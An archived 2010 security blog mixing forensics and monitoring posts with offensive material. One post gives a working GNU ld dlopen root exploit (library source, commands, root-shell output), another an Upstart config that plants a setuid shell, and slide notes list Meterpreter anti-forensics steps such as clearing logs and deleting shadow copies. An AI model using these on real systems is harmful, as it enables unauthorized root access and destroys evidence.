Thursday, November 25, 2010

Full packet capture on Cisco Firewall

Via opensourceforensics.org

 Create and fire up the packet capture
# capture MYCAP interface IFNAME packet-length 1500 buffer SIZE

The above command will capture everything; if you want to filter your capture, add an access list, like so:
# capture MYCAP interface IFNAME packet-length 1500 access-list 777 buffer SIZE

Remember to define access-list 777 first. Of course, you can substitute 777 with any other number.
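For example, to capture only the traffic to and from a single host, the access list could look like this (ASA-style syntax; the address is a placeholder):

```
access-list 777 extended permit ip host 192.0.2.10 any
access-list 777 extended permit ip any host 192.0.2.10
```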

Stop the capture
# no capture MYCAP interface IFNAME

Retrieve the captured data
Point your browser to the firewall SSL URL like so:
https://FW-IP-address/capture/MYCAP/pcap
Download the pcap file, and open it with wireshark or a similar tool.
Note: you can also use tftp to get the pcap.
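For the tftp route, something like the following should work (server address and filename are placeholders; the exact syntax may vary by software version):

```
# copy /pcap capture:MYCAP tftp://192.0.2.50/MYCAP.pcap
```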

Clean-up
# no capture MYCAP

Two new privilege escalations in Windows

Two new privilege escalations in Windows have appeared this week.

Privilege escalation in the Scheduler
Via h-online.com
Microsoft has already patched three of the four security holes exploited by Stuxnet, but the fourth hole remains unpatched. Now, an exploit currently being circulated on the web uses the remaining hole in the Windows Task Scheduler to access protected system directories, even if a user is only logged in with limited access privileges. Experts call this a privilege escalation attack.
According to webDEViL, who developed the exploit, the demo malware works under Windows 7, Vista and Server 2008, both in their 32-bit and in the 64-bit versions.


Privilege escalation in the Registry
Via isc.sans.edu  exploit-db.com  packetstormsecurity.org
Today, proof of concept code (source code, with a compiled binary) for a 0-day privilege escalation vulnerability in almost all Windows operating system versions (Windows XP, Vista, 7, Server 2008 ...) was posted on a popular programming web site.
The vulnerability is a buffer overflow in the kernel (win32k.sys) and, due to its nature, allows an attacker to bypass User Account Control (UAC) on Windows Vista and 7.
What's interesting is that the vulnerability exists in a function that queries the registry, so in order to exploit it the attacker has to be able to create a special (malicious) registry key. The author of the PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (that is, a user without any administrative privileges).
The PoC code creates such a registry key and calls another library which tries to read the key; during that process it ends up calling the vulnerable code in win32k.sys. Since this is a critical area of the operating system (the kernel allows no mistakes), the published PoC only works on certain kernel versions, while on others it can cause a nice BSOD. That being said, the code can probably be modified relatively easily to work on other kernel versions.

Tuesday, November 23, 2010

SSL MITM with sslstrip

Nice article that shows how to perform a MITM attack with sslstrip

Open Source Digital Forensics

I have found the Open Source Digital Forensics website via the Internet Storm Center.

The Open Source Digital Forensics site is a reference on the use of open source software in digital investigations. As shown in the papers section, open source software may have legal benefits over closed source software.

  • An investigator can learn and testify about what her open source forensic analysis tools did.
  • An investigator can testify about the conditions that existed in the suspect's open source software for a piece of evidence to be generated (i.e. a log entry).

We do not claim that open source tools are superior to closed source tools. Both can have serious bugs and faults and produce errors. This site provides an easy reference for investigators who are interested in using open source analysis tools during an investigation.

The tools section is really interesting. It covers the following areas:

  • Tools to boot a suspect system into a trusted state.
  • Tools to collect data from a dead or live suspect system.
  • Tools to examine the data structures that organize media, such as partition tables and disk labels.
  • Tools to examine a file system or disk image and show the file content and other metadata.
  • Tools to analyze the contents of a file (i.e. at the application layer).
  • Tools to analyze network packets and traffic. This does not include logs from network devices.
  • Tools to analyze memory dumps from computers.
  • Frameworks used to build custom tools.

Thursday, November 18, 2010

Doing penetration testing with a minimal footprint

This presentation from Hack3rCon shows how to perform a penetration test that leaves a minimal footprint, thanks to the Metasploit Meterpreter.

It describes techniques to avoid leaving footprints in the Event Log, the Windows Registry, the Windows Prefetch and the File System.

Below you can read my notes (almost a copy of the slides)


Operating in the Shadows, by Carlos Perez a.k.a. Darkoperator, from Adrian Crenshaw on Vimeo.



Meterpreter
 - Runs in memory (no disk access)
 - Memory scrubbing: not easy to understand what Meterpreter did when analyzing a memory image
 - Windows API access
 - HTTPS, TCP and UDP (DNS)
 - Encrypted traffic (man in the middle, self-generated keys)
 - Can be automated and extended

Why leave a minimal footprint?
- Test incident response
- Test monitoring systems
- Simulate real-world attacks

Planning
- list of targets and goals (business and technical point of views)
   * Interview the client and information gathering
- Enumerate target capabilities
- Physical, SE and network
- Design an initial plan
- Modify your plan as you keep advancing
  * Gather information from the hosts (data and configuration)
  * Modify your plan if something looks out of place

Know your enemy
- First go for the easy targets
  * They will check the processes running, connections, registry keys,
     event logs and they may dump the memory
- Not all companies have an IR team
- In some companies, the system administrators are also doing security.
- We can predict what the defenders are going to do

- Their questions:
  * Process list: time of creation, parent PID, owner and command line
  * Connections: why is a process like 'notepad' connecting to the Internet?
  * Why is Internet Explorer connecting to a non-standard port?
  * etc.
- They will create a timeline to investigate the incident.

Event log
- Commands and capabilities differ among Windows versions
  (they also do not record the same data and they use different formats)
- Event log: binary format up to Windows XP; XML-based format on Vista, 7 and 2008
- The IDs also changed with the new formats
- We can read from the registry without leaving footprints.
- We can get the file location, name and configuration out of the registry:
  HKLM\SYSTEM\CurrentControlSet\Services\
- The 'event_manager' script works with the Event Log from memory: query, clear, etc. It saves the data locally in a CSV file.
- Windows 7 and Windows 2008 can send event logs to other servers using WinRM (SSL and self-generated certificates)
- A server can collect remote event logs if the Wecsvc service is running
- Wecsvc can be queried with the wecutil command: es (enumerate subscriptions) and gs (get subscription configuration)
- Most interesting entries: scheduled tasks, accounts added/changed/removed, services stopped/started, logon/logoff, failed logons, users added to/removed from a group
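Triaging a CSV export like the one event_manager produces is easy to script. A hedged Python sketch follows; the column layout and the Vista-era event IDs are illustrative assumptions, not the tool's documented format:

```python
import csv
import io

# Hypothetical filter over a locally saved event-log CSV; keep only the
# "interesting" entries listed above. IDs are assumptions for illustration:
# 4624 logon, 4625 failed logon, 4698 scheduled task, 4720 new account,
# 7036 service state change.
INTERESTING = {4624, 4625, 4698, 4720, 7036}

sample = io.StringIO(
    "EventID,Time,Message\n"
    "4625,2010-11-25 10:00,Failed logon\n"
    "1000,2010-11-25 10:01,Application popup\n"
    "4698,2010-11-25 10:05,Scheduled task created\n"
)

hits = [row for row in csv.DictReader(sample) if int(row["EventID"]) in INTERESTING]
print([row["Message"] for row in hits])  # ['Failed logon', 'Scheduled task created']
```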

Windows Registry
- OS settings
- Group policy settings
- Application settings
- Read access is available on most of it
- With UAC enabled in Windows 7/2008R2, administrators may not be able to modify registry keys
- It can be configured to log access and modifications (not set by default and rarely used)
- ACLs can be placed on registry keys (not set by default and rarely used)
- Metadata only shows the Write and Creation times, but not the Access time
- We need special tools to get the Write time: F-Response, EnCase and open source tools (http://www.forensicswiki.org/wiki/Windows_Registry)

Windows Prefetch
- Saves a list of the most commonly executed binaries to speed up the boot process. Enabled by default on client operating systems since XP.
- It shows how many times a file has been executed since it first appeared in the prefetch.
- Lives in %windir%\prefetch and can only be deleted by the administrator
- Configuration saved in the registry
- Anything we do on the computer will create a file there.

User Assist
- Registry key that keeps a counter of the programs executed through Explorer.exe
- HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
- Each value name is the name of the executable/shortcut encoded in ROT-13 (easily decoded)
- Only covers commands executed through the GUI
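The ROT-13 decoding is trivial to reproduce. A quick Python sketch (the encoded value name below is fabricated for illustration, not taken from a real hive):

```python
import codecs

# UserAssist value names are the executable/shortcut paths with the
# letters rotated by 13; digits and punctuation are left untouched.
encoded = "HRZR_EHACNGU:P:\\Jvaqbjf\\flfgrz32\\pnyp.rkr"  # fabricated example
decoded = codecs.decode(encoded, "rot_13")
print(decoded)  # UEME_RUNPATH:C:\Windows\system32\calc.exe
```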

File System
- 2000, XP and 2003 record the last access time by default
- Vista, 7 and 2008 do not (for performance)
- Cleaning a file's MACE times will not help, since only $STANDARD_INFORMATION is modified. The data will remain there.
- Deleted files and directories can be preserved in a Volume Shadow copy (VSS snapshots), which is enabled by default
- Some folders and file types are excluded from the snapshots, and this information can be queried.

How To Operate
- Use Meterpreter commands
- Understand the scripts. Are they uploading/creating files or directories?
- check if prefetch and Volume Shadows are enabled
- Do not forget the User Assist key if the GUI is used

Know your Environment
- check your privileges
- What is running?
- What is being logged by EventLog?
- Is VSS enabled?
- What tools are they using?
- Is last Access Time logged?

Clear the Tracks
- Sometimes it is better to clear the security log, even if it is a dead giveaway
- Delete the files and then wipe them with cipher.exe
- Delete the Volume Shadows after wiping the files
- Delete prefetch entries on client computers

Execution of Commands
- Execute from Explorer
- Use Incognito or tokens if you are SYSTEM
- If you are placing tools, stream them under system executables (NTFS alternate data streams) and execute them from there
- Use Railgun instead of executables when possible (nothing is written to disk because it injects DLLs)

Hide your Connections
- The connections must look 'normal'. Try to behave like a legitimate user/server would.
- Use IPv6 when it is available, because people are not looking at it.

Where to Take a Dump
- Files in the temporary folders have weird names.
- If you are not able to delete the VSS, check the file extensions and temporary folders.
- Be careful what you write to disk, because the antivirus will check the files (VBS scripts, payloads)
- The duplicate and multi_meter_inject scripts can inject a Meterpreter payload into the memory of a running executable.

Wednesday, November 17, 2010

Tracking malware on a budget

Many people in IT will agree that budgets are getting smaller, if you are lucky enough to have any money left at this time of the year ;)   This post talks about finding infected computers in our networks without spending lots of money on expensive systems.

There is more and more research that provides lists of C&C servers, for the most common botnets.

As a quick summary:
- etc.

Making use of this information, we can set up an environment that lets us quickly detect compromised computers in our network that try to reach the C&C servers, making detection and clean-up faster.

A possible setup could be a DNS sinkhole plus some signatures in our IDS (all the traffic redirected by the DNS sinkhole is worth attention). This can be completed with a dedicated web server that lets us learn the URLs being used to fetch the malware.

This point of view is interesting because it permits us to gather intelligence instead of just blocking the malware.  This way, we have the opportunity to perform a  malware analysis that will help us to understand how it behaves and, thus, provide a quick way to find/remove it from our computers.
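As a sketch of the detection side, the published C&C lists can be matched against observed DNS queries. The domains and log entries below are made up for illustration:

```python
# Known C&C domains, e.g. collected from published botnet research.
CNC_DOMAINS = {"evil-botnet.example", "c2.bad.example"}

def is_suspicious(query: str) -> bool:
    """True if the queried name is a known C&C domain or a subdomain of one."""
    name = query.rstrip(".").lower()
    return any(name == d or name.endswith("." + d) for d in CNC_DOMAINS)

dns_queries = ["www.google.com", "update.evil-botnet.example", "c2.bad.example"]
print([q for q in dns_queries if is_suspicious(q)])
# ['update.evil-botnet.example', 'c2.bad.example']
```

Internal hosts whose queries match the list are the ones to redirect to the sinkhole and investigate.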

Saturday, November 13, 2010

Quick introduction to Network Security Monitoring

Network Security Monitoring is the area of Information Security I love most, Unix systems aside, and I have wanted to write about this methodology since I started this blog :)


Many of the concepts I am going to talk about are better explained in Richard Bejtlich's awesome book, The Tao of Network Security Monitoring: Beyond Intrusion Detection. You can find more information about the book on his website.



The idea behind NSM is that network monitoring is not just a matter of deploying an IDS or IPS in the network. When an alert is generated, the only information we have is a rule and a small packet capture with the bytes that triggered the alert.

The questions here are: do we have enough information to confirm whether this was an attack? Was it successful? Can we easily track the activities performed by the attacker in our network? The short answer is: we do not know! We do not have enough details to perform an investigation.


NSM is a methodology that tries to solve this problem by offering the data that an analyst needs to perform the investigation. I will not explain all the details, because it is too long for a blog post, but I will try to briefly explain the main concepts.



Full content data

It is easy to understand that, in an ideal scenario, a full packet capture of the traffic generated by the attacker should be enough, because it contains all the details of the activities performed by the attacker in our network.

With this data, we can confirm whether an attack was successful and whether the attacker went deeper into our network. Furthermore, we can obtain the toolkits that were downloaded to the compromised server. The attacker can try to fool a forensic analyst who is analysing the compromised computer, but that is not possible with network communications.

Session data
Unfortunately, full content data does not scale. An analyst cannot easily perform an investigation with huge amounts of data, and it is even worse when the task is in real time. Session data helps to solve this problem because it is just a summary of the traffic that passed through our sensors.

An analyst can quickly track the attacker by applying filters to the session data and then going to the full content data when needed. At this point, the available data consists of all the communications at the transport layer, without the content of the packets. This includes IP addresses, protocols, ports, flags, etc.
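A toy illustration of the idea in Python, collapsing packets into per-flow records; the sample packets are invented:

```python
from collections import Counter

# Each packet is reduced to its 5-tuple; payloads are discarded.
packets = [
    ("10.0.0.5", 44321, "192.0.2.10", 80, "tcp"),
    ("10.0.0.5", 44321, "192.0.2.10", 80, "tcp"),
    ("10.0.0.9", 53000, "198.51.100.7", 22, "tcp"),
]

flows = Counter(packets)  # session data: one record per flow, with a packet count
for (src, sport, dst, dport, proto), count in flows.items():
    print(f"{proto} {src}:{sport} -> {dst}:{dport} packets={count}")
```

Real session data (e.g. NetFlow) also keeps timestamps and byte counts, but the compression principle is the same.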

Statistical analysis and external indicators of a compromise
Having a good baseline of our network and equipment helps to detect unexpected changes that may be caused by an incident or an intrusion: high network traffic, servers under high load, etc.

Sometimes this statistical analysis can be complemented by other indicators: servers or routers crashing, people complaining that an application is not working, etc. Intelligence and information gathering can also be added here: third-party companies/institutions complaining about attacks from our network, a post on the Internet saying that we were compromised, possible active threats, etc.
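A minimal sketch of the statistical idea, flagging values that deviate sharply from the baseline; the traffic figures are invented:

```python
from statistics import mean, stdev

# Hourly traffic baseline in Mbps (fabricated sample values).
baseline = [100, 110, 95, 105, 102, 98, 107]
threshold = mean(baseline) + 3 * stdev(baseline)

def is_anomalous(mbps: float) -> bool:
    """Flag traffic more than three standard deviations above the baseline."""
    return mbps > threshold

print(is_anomalous(450))  # True: worth a closer look
print(is_anomalous(104))  # False: within the normal range
```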


Intrusion Detection Systems
In practice, a human cannot spot an attack in real time just by looking at the generated data. We need a tool that automates this process, so the analyst only has to validate the alerts with the available data, as already explained. If an incident is ongoing, the analyst will escalate the alert to the CIRT (Computer Incident Response Team).

It is important to note that we are using an IDS (Intrusion Detection System) and not an IPS (Intrusion Prevention System). Our goal is to gather enough information to understand the attacks and act accordingly. An IPS would block a possible attack, but we would miss the full picture of the incident.

Friday, November 12, 2010

Tool for timeline analysis: log2timeline

log2timeline is a framework for the automatic creation of a super timeline. Its main purpose is to provide a single tool to parse various log files and artifacts found on suspect systems (and supporting systems, such as network equipment) and produce a timeline that can be analysed by forensic investigators/analysts.

Example of usage: introduction  and solution

Paper

OSX update breaking PGP full disk encryption

Via darknet :

For the past day or so I’ve been seeing endless people tweeting about how the latest Mac OS X update b0rks your Mac if you are using PGP full disc encryption. It’s a pretty nasty bug, but thankfully it can be recovered from fairly easily.
If you are just looking for a quick solution, you can:
a) Not apply the update (as recommended by PGP)
b) Decrypt your volumes, apply the update, then re-encrypt

For the LOL:

Users of PGP’s Whole Disk Encryption for Macs got a nasty surprise when they upgraded to the latest OS X update once they discovered their systems were no longer able to reboot.

It seems that Apple and the Symantec-owned PGP suffered a near-fatal failure to communicate that 10.6.5 ships with a new EFI booter that was incompatible with the encryption software’s boot guard. As a result, the update rendered Macs using WDE as little more than expensive paperweights.

“PGP you DO HAVE A FREAKING DEVELOPERS LICENCE FOR APPLE RIGHT???” one outraged user vented here. “YOU CANNOT TEST SYSTEM RELEASES IN ADVANCE???”
A fix was provided yesterday morning by PGP, the details are here:
Mac PGP WDE customers should not apply the recent Mac OS X 10.6.5 update

UPDATE: H security also talks about the same problem.

Physical Penetration Testing Presentation

Nice presentation given at Hack3rCon 2010

The original videos can also be found here

Summary
- Purpose and goals of the pentest
  (the customer may not know or be wrong)

  * What is running your business?

- Why?
  * attack vectors
  * evaluate the controls
  * potential vulnerabilities
  * find real threats to the organization
  * It must be a repeatable process and easy to explain
    (the methodology is important)
  * perhaps a security review can be done instead of a pentest
    (a pentest in a really insecure place is not worthwhile)


- Scope
  * which targets can you attack, and how?
  * what are you authorized to do versus the real world?

- Methodologies
  * Open Source Security Testing Methodology
  * ISECOM
  * Crime Prevention Through Environmental Design

- Threat Source Analysis
   * actors
   * Funding, motivation and time

- Method
  * research
  * reconnaissance (google maps :D )
  * planning
  * execution
  * extraction
  * Wrap Up

- Real world examples

- Reporting

- Getting caught by the police :D

- Recommended reading

- Training

Wednesday, November 10, 2010

Quick introduction to shellcoding

This is just a presentation from 2007 that gives a quick introduction to shellcoding.

More info: Slides Video

Executing programs from memory with Metasploit

One of the most powerful features of Metasploit is the ability to execute programs from memory, without writing files to disk.

The guys from Pauldotcom had a nice technical segment in their podcast. The video shows how to duplicate (or create multiple instances of) a Meterpreter session by injecting it into another process.

They also show how to dump the memory of a process without touching the disk.






Show notes

Monday, November 8, 2010

Escalation via a library upload and the GNU ld dlopen vulnerability

In my previous post I was trying to find ways to gain a root shell by using the dlopen vulnerability, but I could not find anything interesting because I was looking in the wrong place.

At this point, we have two facts:
  • I can create world-writable files as root
  • I can load libraries that are not meant to be used by a setuid program
I was looking for ways to subvert services to gain root, when the answer was right there in the advisory.

By having the ability to upload my own evil library to the host and then execute it as described in the PoC, I can gain a root shell easily. But, since I can only load a library if it is located in a path defined in /etc/ld.so.conf, I have to find a way to copy my library into a valid directory, which is going to be owned by root.

Well, the solution to this problem is to use the vulnerability to create a world-writable file in such a path (e.g. /lib) and then overwrite it with the contents of the library.

Once the library is loaded, we only need to use the vulnerability again to get a root shell and then secure our access to the system.

The library is really simple. It only defines a constructor that is executed by the setuid program.

#include <unistd.h>

/* Constructor: runs automatically when the library is loaded by the
   dynamic linker, before main() of the setuid program. */
static void
__attribute__ ((constructor))
install (void)
{
  execl("/bin/sh", "/bin/sh", (char *) 0);
}

At this point, we only have to compile the library and follow the steps explained before:


umask 0                                 # files we cause root to create will be world-writable
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping   # the setuid binary creates the world-writable file in /lib
cat ./libevil.so > /lib/libevil.so      # overwrite it with our library
LD_AUDIT="libevil.so" ping              # the linker loads our constructor: root shell

As a result, we have a root shell:

user@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami
root
#

Note: this attack has been tested on an unpatched Ubuntu 10.10

Friday, November 5, 2010

Privilege escalation with Upstart and the GNU ld dlopen vulnerability

As I wrote in the previous post, GNU ld dlopen privilege escalation, we can create world-writable files owned by root. The advisory states that we can create a file in /etc/cron.d/ and thus gain root privileges by creating an entry that drops a setuid root shell, but that is not the case, because Cron checks the permissions and does not allow crontabs with global write permissions (for the group or for others).

Gaining root access is not easy, because the umask does not allow the execute flag for files. So we cannot, as a simple example, put a file in the PATH that impersonates a legit binary while dropping a suid shell somewhere in the file system.

There are not many places in a Unix system where we can put a file that is going to be parsed (not executed) by an application running as root and that, at the same time, permits executing arbitrary commands (Cron is not one of them, as commented above).

An option could be to create /etc/profile or /etc/bashrc if they do not exist, because they are going to be sourced by bash when root logs into the server, but they already exist on many systems, and the PoC creates files but does not change permissions.

I have found out that Upstart, which is used by many distributions, does not check the permissions when reading its configuration files, and it offers directives to execute binaries (like getty, anacron, etc.). This way, the attacker can create a configuration file that will instruct Upstart to drop a suid root shell at boot time, thanks to the vulnerability in GNU ld.


Privilege escalation


The following example only applies to Ubuntu, but it can be adapted for other distributions.
- The Upstart configuration files are located in the /etc/init directory and named XXX.conf
- The directory is owned by root with 755 permissions

The attacker has to create the file /etc/init/tty7.conf by executing the PoC and then writing the following content into it.
---
start on runlevel [12345]
exec /bin/bash -c "chown root.root /home/msk/exploit/shell ; chmod u+s /home/msk/exploit/shell"
---
Where /home/msk/exploit/shell is a small binary that executes /bin/sh after calling setuid(0)/setgid(0)


After rebooting, /home/msk/exploit/shell will be a binary owned by root with the setuid bit set

Thursday, November 4, 2010

Analysis techniques in image forensics

Nice post from the Windows Incident Response blog that describes several techniques for analyzing disk images.

Timeline analysis
This is a great analysis technique to use due to the fact that when you build a timeline from multiple data sources on and from within a system, you give yourself two things that you don't normally have through more traditional analysis techniques...context, and a greater relative level of confidence in your data.
 As to the overall relative level of confidence in our data, we have to understand that all data sources have a relative level of confidence associated with each of them. For example, from Chris's post, we know that the relative confidence level of the time stamps within the $STANDARD_INFORMATION attributes within the MFT (and file system) is (or should be) low. That's because these values are fairly easily changed, often through "time stomping", so that the MACB times (particularly the "B" time, or creation date of the file) do not fall within the initial timeframe of the incident. However, the time stamps within the $FILE_NAME attributes can provide us with a greater level of confidence in the data source (MFT, in this case). By adding other data sources (Event Log, Registry, Prefetch file metadata, etc.), particularly data source whose time stamps are not so easily modified (such as Registry key LastWrite times), we can elevate our relative confidence level in the data.
 Note: The SANS Computer Forensic blog talks about the same subject.

It makes sense because an analyst cannot trust only a single source of information.  We must correlate multiple data sources in order to get the full picture (context) and spot possible manipulations.
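The correlation step can be pictured as merging per-source event lists into one sorted timeline. A hedged Python sketch, with fabricated events:

```python
from datetime import datetime

# Each data source contributes (timestamp, source, description) tuples.
fs_events = [(datetime(2010, 11, 1, 10, 0), "mft", "evil.exe created ($FILE_NAME)")]
reg_events = [(datetime(2010, 11, 1, 10, 1), "registry", "Run key LastWrite updated")]
log_events = [(datetime(2010, 11, 1, 9, 59), "evtlog", "network logon from 10.0.0.5")]

timeline = sorted(fs_events + reg_events + log_events)  # chronological merge
for ts, source, description in timeline:
    print(ts.isoformat(sep=" "), source, description)
```

If one source disagrees with the others (e.g. a $STANDARD_INFORMATION time far earlier than everything around it), that is itself a hint of manipulation.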


Timeline Creation
On systems with a lot of noise, it does not make sense to create a full timeline, because the background noise may cause you more problems than targeting only the areas you are interested in.
However, there is a method to my madness, which can be seen in part in Chris's Sniper Forensics presentation. I tend to take a targeted approach, adding the information that is necessary to complete the picture. For example, when analyzing a system that had been compromised via SQL injection, I included the file system metadata and only the web server logs that contained the SQL injection attack information. There was no need to include user information (Registry, index.dat, etc.); in fact, doing so would have added considerable noise to the timeline, and the extra data would have required significantly more effort to analyze and parse through in order to find what I was looking for.
Feedback loop
Use a knowledge database updated with findings from your previous investigations. Also, sharing information within a team is vital to achieve the goals and be more efficient.

There are also some comments about RegRipper,

RegRipper is a Windows Registry data extraction and correlation tool. RegRipper uses plugins (similar to Nessus) to access specific Registry hive files in order to access and extract specific keys, values, and data, and does so by bypassing the Win32API.


This tool can help to automate registry analysis that could indicate compromises, the presence of malware, etc., with the help of the knowledge database.

The Botnet Wars: a Q&A

Interesting article that describes how botnets and the underground market work.
In today’s article (which will be a Q&A, a question & answer), I hope to be able to clear up the mystery behind these kits. I have been able to interview experts in the anti-malware world. They will each give their opinion on this particular subject.

Wednesday, November 3, 2010

w3af 1.0-rc4 available

Andres Riancho has announced  that a new version of w3af is available.

Just to name a few things we've done for this release:  
* We've written new HOWTO documents for our users 
* Considerably improved the speed of all grep plugins 
* Replaced Beautiful Soup by the faster libxml2 library 
* Introduced the usage of XPATH queries that will allow us to improve performance and reduce false positives 
* Fixed hundreds of bugs
On this release you'll also find that after exploiting a vulnerability you can leverage that access using our Web Application Payloads, a feature that we developed together with Lucas Apa from Bonsai Information Security. These payloads allow you to escalate privileges and will help you get from a low-privileged vulnerability (e.g. local file read) to remote code execution. In order to try them, exploit a vulnerability, get any type of shell and then run any of the following commands: help, lsp, payload tcp (the last one will show you the open connections in the remote box).

Detecting time stamp manipulations in the file system

Awesome article from SANS computer forensics blog entitled Digital Forensics: Detecting time stamp manipulation.

The post describes how to spot time stamp manipulations when performing a forensic analysis.

The NTFS file system stores the time stamps in two different attributes ($STANDARD_INFORMATION and $FILE_NAME), and both have the fields Modified, Accessed, Changed and Born (MACB).

Dave Hull used the $FILE_NAME attribute to spot the time stamp manipulations that may be done by tools like  timestomp or Metasploit.

$FILE_NAME is not a standard attribute that all forensic tools can extract, but Mark McKinnon has written a tool called mft_parser (not released yet) that can do it.

mft_parser_cl <MFT> <db> <bodyfile> <mount_point> 
The “db” argument is the name of a sqlite database that the tool creates, “bodyfile” is similar to the bodyfile that fls from Brian Carrier’s The Sleuth Kit produces, except that it will also include time stamps from NTFS’ $FILE_NAME attribute. The “mount_point” argument is prefixed to the paths in the bodyfile, so if you’re running this tool against a drive image that was drive C, you can provide “C” as an argument.


Notes:
Bodyfile: a listing of the files and directories in a file system, with their time stamps.

ProFTPD preauth remote buffer overflow

TippingPoint, under the Zero Day Initiative, has published a preauth remote overflow in ProFTPD.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ProFTPD. Authentication is not required to exploit this vulnerability. 
The flaw exists within the proftpd server component which listens by default on TCP port 21. When reading user input if a TELNET_IAC escape sequence is encountered the process miscalculates a buffer length counter value allowing a user controlled copy of data to a stack buffer. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the proftpd process.

Welcome back to the 90's! This smells like a  classic exploit :D

UPDATE:  the exploit has been published as well as the advisory from Zero Day Initiative.

Emerging Threats under DDoS

As Matthew Jonkman comments in the emerging-sigs mailing list, Emerging Threats has been under a DDoS attack since November 1st, but rule distribution is not being affected.

Still taking a DDoS, but we have a good idea who it is. For the time being do NOT visit emergingthreats.net. http://www.emergingthreats.net is fine, but will be down for a while yet likely. 
Rules are unaffected, make sure you're downloading from rules.emergingthreats.net. 
Thanks for everyone's support. We're doing something right if they're spending time on us. Rally the troops! Keep up the fight!
Matt